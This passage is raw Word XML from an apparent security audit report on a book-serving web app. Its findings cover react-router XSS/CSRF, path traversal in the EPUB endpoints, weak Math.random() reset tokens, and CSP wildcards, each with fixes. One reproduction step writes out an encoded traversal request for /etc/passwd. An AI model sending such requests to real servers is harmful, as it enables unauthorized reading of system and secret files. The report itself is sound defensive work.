                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>react-router has XSS via open redirects, CSRF in action/server action request processing, DoS via cache poisoning forcing SPA mode, and SSR XSS in ScrollRestoration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B734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EE47DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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2C60FB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XSS and CSRF vulnerabilities in the routing layer could enable client-side attacks even without server-side flaws.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="038E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0D646A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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E3FC5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: npm audit detects this.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="059D4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83B430">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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55DE20">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run: npm audit fix to upgrade to react-router &gt;=7.12.1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53CD8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7CB176">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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0F5258">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="199FA3E8">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15999CAA">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-007: Path Traversal in File Serve Endpoints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0776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5B7E6A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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07E063">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="17AB5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CC83A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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D1E6F9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path Traversal via path.join() with User Input in EPUB/Cover Serve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6839B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CC3145">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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6FA7BD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST — Semgrep (automated pipeline, 5 findings)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1856F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F7BAFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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479C5FA1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60CF4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92ABD6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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34844B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A01:2021 — Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27913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40526E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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BB217C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-22: Path Traversal, CWE-73: External Control of File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4469A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6B8082">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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1C3FCE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1904E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63CA16">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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C7BB20">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>server.ts lines 414, 419, 424, 428, 444 use path.join(EPUB_DIR, req.params.filename) and res.sendFile() with user-controlled filename. The existing guard uses string comparison (startsWith) which can be bypassed with URL-encoded traversal sequences on certain platforms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D3B9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0C909C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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998599">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker can read arbitrary files from the server filesystem, potentially including .env.local (containing secrets), /etc/passwd, or other sensitive files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A498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BA19B5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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E2E633">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Send GET /api/books/epub-upload/..%2F..%2F..%2Fetc%2Fpasswd 2. If the startsWith guard is bypassed, the server reads and returns /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DF2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0DDA1C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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5D0E49">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Use path.resolve() instead of path.join(), then verify the resolved path starts with the intended directory using path.resolve(). Add: const resolved = path.resolve(EPUB_DIR, filename); if (!resolved.startsWith(path.resolve(EPUB_DIR))) return res.status(403).send('Forbidden');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0DF36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542A6D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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6397B5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E936FA1">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0C0B5D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-008: Weak PRNG for Password Reset Tokens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852D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833B14">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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D306B9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7FFAC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909360">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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CC7270">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Math.random() Used for Security-Critical Reset Token Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="62F69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59A8E3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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03103F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual code review (server.ts forgot-password route)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18B33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F9114F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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7EF69520">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B93E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76B9A2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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9845C3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A02:2021 — Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25064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8E92F9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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068405">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-330: Use of Insufficiently Random Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5E8CD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427FAE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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9DB6A4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.4 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B396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E1B0EE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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CF91C1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password reset tokens are generated using Math.random().toString(36) concatenated twice. Math.random() is a PRNG (not CSPRNG) and its output is predictable given seed knowledge. Additionally, reset tokens are stored in plaintext in the users collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11294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38CC71">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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C82209">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker could predict reset tokens and reset any user's password, gaining full account access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6251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A0F87C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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AFEF93">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Request password reset for a known email 2. Observe timing and attempt to predict Math.random() output 3. Use predicted token at POST /api/auth/reset-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="188B1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C85D3E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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3D9BF4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replace with: const token = require('crypto').randomBytes(32).toString('hex'). Store as bcrypt hash in DB, compare on verification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C0D2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BCCF13">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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F83952">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2675C20D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6670CE0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.3 Medium Severity Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA508D1">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512B26C1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-009: Content Security Policy — Wildcard and Unsafe Directives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27CB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00076D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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099D96">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="48409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39E058">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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AE3C78">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CSP Header Uses Wildcard Sources, unsafe-eval, and unsafe-inline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D091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07E345">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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281E61">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST — OWASP ZAP (5 related alerts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="038BC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3538C5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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2DCA7A85">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="239D2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A49929">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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221F01">
            <w:r>
              <w:rPr>
